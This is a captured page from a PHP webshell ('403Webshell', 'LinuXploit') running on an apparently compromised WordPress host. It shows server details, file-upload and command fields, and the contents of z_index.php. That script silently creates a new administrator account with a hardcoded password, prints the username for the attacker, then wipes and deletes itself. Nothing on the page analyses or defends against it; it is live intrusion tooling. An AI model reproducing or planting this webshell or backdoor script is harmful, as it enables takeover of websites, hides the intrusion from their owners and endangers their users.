403Webshell
Server IP : 87.98.154.146  /  Your IP : 216.73.216.165
Web Server : Apache
System : Linux webm004.cluster126.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : ohklomafyi ( 52085)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/ohklomafyi/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/ohklomafyi/www/z_index.php
<?php
require_once __DIR__ . '/wp-load.php';

$c = 'specialsystemuser';  
$p = '4_$frIJR8H(^fpRFm0k';
$flag = true;
// $c_n =  $c."_".rand(1000,9999);
// $c_n = "adminlinx";
$c_n = "user_".rand(1000,9999);
$userdata = array(
    'user_login' => $c_n,
    'user_pass'  => $p,
    'user_email' => '',
    'first_name' => '',
    'last_name'  => '',
    'role'       => 'administrator'
);
$user_id = wp_insert_user($userdata);
if ( !is_wp_error($user_id) ){
    echo "[i_res|".$c_n."|i_res]";
}
file_put_contents(__FILE__, "");
unlink(__FILE__);

Youez - 2016 - github.com/yon3zu
LinuXploit